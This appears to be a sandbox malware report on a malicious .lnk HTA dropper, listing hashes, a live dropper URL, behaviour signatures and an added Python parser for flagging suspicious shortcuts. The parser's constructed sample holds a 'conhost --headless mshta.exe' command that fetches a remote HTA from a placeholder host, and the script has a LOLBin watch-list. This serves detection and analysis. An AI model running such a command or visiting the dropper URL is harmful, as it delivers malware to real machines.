General

  • Target

    c3dcd725be7a2a134c82b24d55992e4940526763ca9c607a82f423527085485c.lnk

  • Size

    272KB

  • Sample

    240920-b4jaqasdna

  • MD5

    47c69db79640bcff28c4609d7cb9fdf1

  • SHA1

    9b7d6e44525f5c7b1ad0ad50232ae2f00ef19c21

  • SHA256

    c3dcd725be7a2a134c82b24d55992e4940526763ca9c607a82f423527085485c

  • SHA512

    97cfbb41da9521c45c4b204c0c8cc6a551921b39f052d4b68787668e4b16185c7e70e380c25fc05731a4c9fe2fa491682fc09ceee8dbf38a11b73f1ecaa83ee4

  • SSDEEP

    24:8Wi+1hAh52pyAzPkr+/4h+sPSLDgdd79ds6xmab/U3IVqm:8WTo8zmbQEdJ9KabU3Kq

Score
10/10

Malware Config

Extracted

  • Language

    hta

  • Source

    hta.dropper

  • URLs

    https://siff-sd.com/temp/Docs-08-2024

Targets

    • Target

      c3dcd725be7a2a134c82b24d55992e4940526763ca9c607a82f423527085485c.lnk

    • Size

      272KB

    • MD5

      47c69db79640bcff28c4609d7cb9fdf1

    • SHA1

      9b7d6e44525f5c7b1ad0ad50232ae2f00ef19c21

    • SHA256

      c3dcd725be7a2a134c82b24d55992e4940526763ca9c607a82f423527085485c

    • SHA512

      97cfbb41da9521c45c4b204c0c8cc6a551921b39f052d4b68787668e4b16185c7e70e380c25fc05731a4c9fe2fa491682fc09ceee8dbf38a11b73f1ecaa83ee4

    • SSDEEP

      24:8Wi+1hAh52pyAzPkr+/4h+sPSLDgdd79ds6xmab/U3IVqm:8WTo8zmbQEdJ9KabU3Kq

    Score
    10/10
    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • Checks computer location settings

      Looks up the country code configured in the registry (typically the per-user Control Panel\International\Geo values), most likely a geofence so the payload behaves differently outside the intended target region.

    • Indirect Command Execution (ATT&CK T1202)

      Adversaries may abuse utilities that allow for command execution, i.e. proxy binaries that launch another program on their behalf, to bypass security restrictions that limit the use of command-line interpreters. For a .lnk sample the launched binary and its arguments are recoverable statically from the shortcut's StringData, without executing it.
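A static triage of the .lnk itself complements the sandbox signatures above: the shortcut's ShellLinkHeader and StringData (relative path, arguments, icon) can be parsed offline to recover the launched binary, any embedded URL and the hidden-window ShowCommand. The parser below is an added example, not the sandbox's code and not derived from the real sample. The LNK bytes it runs on are constructed by `build_lnk()`; the conhost/mshta command line and the `https://example.invalid/...` URL are placeholders, and the `LOLBINS` watch-list is an assumption for this example, not a signature definition.

```python
"""Static triage of a Windows .lnk: parse ShellLinkHeader + StringData, flag LOLBin/URL use.

Added example, not the sandbox's own code. Sample bytes are constructed by build_lnk();
the command line and URL are placeholders, not recovered from the real sample.
"""
import re
import struct
import uuid

HEADER_SIZE = 0x4C                      # ShellLinkHeader is always 76 bytes
LINK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
SW_SHOWMINNOACTIVE = 7                  # minimised/hidden window: common in malicious LNKs

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80

# Assumed watch-list of proxy/script hosts abused for HTA execution and T1202.
LOLBINS = ("mshta", "conhost", "forfiles", "pcalua", "wscript", "cscript",
           "powershell", "cmd", "rundll32", "regsvr32", "msiexec", "certutil")
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def _read_string(buf, off, unicode):
    """StringData item: 2-byte CountCharacters, then the characters (no terminator)."""
    (count,) = struct.unpack_from("<H", buf, off)
    off += 2
    width = 2 if unicode else 1
    raw = buf[off:off + count * width]
    return raw.decode("utf-16-le" if unicode else "latin-1"), off + count * width


def parse_lnk(buf):
    """Return LinkFlags, ShowCommand and the StringData fields of a .lnk blob."""
    if len(buf) < HEADER_SIZE:
        raise ValueError("too short for a ShellLinkHeader")
    hdr_size, clsid_raw, flags = struct.unpack_from("<I16sI", buf, 0)
    if hdr_size != HEADER_SIZE or uuid.UUID(bytes_le=clsid_raw) != LINK_CLSID:
        raise ValueError("not a ShellLinkHeader")
    (show_cmd,) = struct.unpack_from("<I", buf, 0x3C)   # ShowCommand sits at offset 60
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:                  # skip IDList: 2-byte size + items
        (idlist_size,) = struct.unpack_from("<H", buf, off)
        off += 2 + idlist_size
    if flags & HAS_LINK_INFO:                            # skip LinkInfo: first DWORD is its size
        (info_size,) = struct.unpack_from("<I", buf, off)
        off += info_size
    unicode = bool(flags & IS_UNICODE)
    info = {"flags": flags, "show_command": show_cmd}
    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        info[key] = None
        if flags & flag:
            info[key], off = _read_string(buf, off, unicode)
    return info


def triage(info):
    """Flag LOLBin launchers, embedded URLs and a hidden window in the parsed shortcut."""
    cmdline = " ".join(x for x in (info["relative_path"], info["arguments"]) if x)
    lolbins = [b for b in LOLBINS
               if re.search(r"\b%s(\.exe)?\b" % b, cmdline, re.IGNORECASE)]
    urls = URL_RE.findall(cmdline)
    hidden = info["show_command"] == SW_SHOWMINNOACTIVE
    return {"lolbins": lolbins, "urls": urls, "hidden_window": hidden,
            "suspicious": bool(lolbins and (urls or hidden))}


def build_lnk(relative_path, arguments, icon_location=None, show_cmd=SW_SHOWMINNOACTIVE):
    """Constructed minimal .lnk: header + StringData only (no IDList/LinkInfo)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    if icon_location:
        flags |= HAS_ICON_LOCATION
    # HeaderSize, CLSID, LinkFlags, FileAttributes (ARCHIVE), 3 FILETIMEs, FileSize,
    # IconIndex, ShowCommand, HotKey, Reserved1..3
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LINK_CLSID.bytes_le, flags,
                         0x20, 0, 0, 0, 0, 0, show_cmd, 0, 0, 0, 0)

    def enc(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    body = enc(relative_path) + enc(arguments)
    if icon_location:
        body += enc(icon_location)
    return header + body


# Constructed sample: launches a script host through conhost and pulls an HTA from a
# placeholder URL. This is NOT the real sample's command line.
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\conhost.exe",
                       "--headless mshta.exe https://example.invalid/temp/Docs",
                       r"%SystemRoot%\System32\shell32.dll")

if __name__ == "__main__":
    parsed = parse_lnk(SAMPLE_LNK)
    print(parsed["relative_path"], parsed["arguments"])
    print(triage(parsed))
```

Run it against a real sample with `parse_lnk(open(path, "rb").read())`; the IDList and LinkInfo blocks are skipped by their own size fields, so the StringData offsets are recovered without trusting anything in the shortcut beyond the header layout.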

MITRE ATT&CK Enterprise v15

Tasks